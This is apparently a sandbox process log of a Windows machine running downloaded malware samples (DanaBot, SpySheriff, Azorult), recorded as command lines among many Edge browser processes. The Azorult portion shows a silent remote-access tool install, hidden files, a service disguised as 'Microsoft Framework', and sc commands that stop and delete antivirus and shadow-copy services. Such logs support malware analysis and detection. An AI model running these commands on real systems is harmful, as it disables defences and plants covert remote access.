"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4204,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4252,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3940,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6064,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6216,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6192 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6324,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6560,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6712,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6892,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6672,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4408,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=4448,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6880,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=6692,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7120,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6152 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=704 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=6500,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5192 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5428,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7408 /prefetch:8
C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@5768
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@1324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1324 -ip 1324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5768 -ip 5768
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 472
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 484
C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7576,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4184 -ip 4184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5144 -ip 5144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 148
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7568,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=5140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7124,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7928 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7620,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:8
C:\Users\Admin\Downloads\SpySheriff.exe
"C:\Users\Admin\Downloads\SpySheriff.exe"
C:\Users\Admin\Downloads\SpySheriff.exe
"C:\Users\Admin\Downloads\SpySheriff.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7644,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5276,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=5556,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=7220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7116 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3008,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7052 /prefetch:8
C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
C:\programdata\install\ink.exe
C:\programdata\install\ink.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7968,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5652 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\SysWOW64\sc.exe
sc delete swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
C:\Windows\SysWOW64\sc.exe
sc stop Adobeflashplayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MoonTitle
C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\sc.exe
sc stop MoonTitle
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
C:\Windows\SysWOW64\sc.exe
sc delete MoonTitle"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop AudioServer
C:\Windows\SysWOW64\sc.exe
sc stop AudioServer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AudioServer"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5292,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:1
C:\Windows\SysWOW64\sc.exe
sc delete AudioServer"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=2720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5452,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7068 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8052,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
